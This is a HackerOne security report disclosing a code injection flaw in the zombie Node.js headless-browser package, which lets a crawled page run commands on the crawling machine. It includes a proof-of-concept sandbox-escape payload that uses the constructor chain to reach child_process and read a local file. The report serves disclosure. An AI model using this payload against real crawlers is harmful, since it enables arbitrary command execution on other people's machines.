Node.js third-party modules: Code Injection Vulnerability in zombie Package

ID H1:389583
Type hackerone
Reporter cris_semmle
Modified 2018-11-23T09:18:45


I would like to report a code injection vulnerability in zombie. It allows crawled websites to access privileged APIs such as the file system or child process.


module name: zombie version: 6.1.2 npm page:

Module Description

Insanely fast, headless full-stack testing using Node.js

Module Stats

12,671 downloads in the last week


Vulnerability Description

Attackers can insert JS code in their pages that exploit the zombiejs code injection vulnerability. If such pages are crawled using zombiejs the machine running the crawler will run arbitrary commands provided by the attacker. For comparison, jsdom disable script execution by default.

Steps To Reproduce:

```js var codeToExec = "var sync=require('child_process').spawnSync; " + "var ls = sync('cat', ['./resources/test.html']); console.log(ls.output.toString());"; var exploit = "c='constructor';require=this[c]c().mainModule.require;" + codeToExec; var attackVector = "c='constructor';this[c]c()"; // end exploit

var express = require('express');

var app = express();

app.get('/test', function(req, res) { res.send("<script>" + attackVector + "</script>"); });


const Browser = require('zombie');

// We're going to make requests to // Which will be routed to our test server localhost:3000 Browser.localhost('', 3000);

const browser = new Browser(); browser.visit('/test', function(a,b) { }); ```


N/A make user aware of this issue and offer a way to disable script execution on untrusted crawled pages.

Supporting Material/References:

Wrap up

  • I contacted the maintainer to let them know: N
  • I opened an issue in the related repository: N


Analysed webpages can execute privileged commands on the machine running zombiejs. This is especially important if zombiejs is used for building a crawler.